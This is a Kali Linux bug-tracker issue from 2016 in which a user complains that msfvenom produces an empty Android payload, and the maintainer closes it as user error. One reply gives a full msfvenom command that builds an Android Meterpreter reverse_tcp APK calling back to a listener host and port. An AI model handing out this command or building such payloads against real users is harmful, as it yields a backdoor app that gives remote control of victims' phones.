View Issue Details

IDProjectCategoryView StatusLast Update
0003360Kali LinuxGeneral Bugpublic2025-07-14 09:14
ReporterDarkAnonymous Assigned Todookie  
PrioritynormalSeveritytrivialReproducibilityalways
Status closedResolutionno change required 
Product Version2016.1 
Summary0003360: msfvenom is creation payload of 0KB!!!!
Description

I tried to create a payload for android using msfvenom but it creates payload of 0KB.

Steps To Reproduce

Just type to create android payload and it will happen always.Not difficult to bring this error.

Attached Files

Activities

rootjb0

rootjb0

2016-06-20 03:12

reporter   ~0005390

You did not put a space between the R and >

Try this:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R > /root/program.apk

In a "normal" terminal emulator, not msfconsole.

dookie

dookie

2016-07-05 16:00

reporter   ~0005445

This is user-error, not a Kali package issue.

Issue History

Date Modified Username Field Change
2016-06-19 16:06 DarkAnonymous New Issue
2016-06-19 16:06 DarkAnonymous File Added: Screenshot from 2016-06-19 21:05:06.png
2016-06-20 03:12 rootjb0 Note Added: 0005390
2016-07-05 16:00 dookie Note Added: 0005445
2016-07-05 16:00 dookie Status new => closed
2016-07-05 16:00 dookie Assigned To => dookie
2016-07-05 16:00 dookie Resolution open => no change required
2025-07-14 09:14 g0tmi1k Priority immediate => normal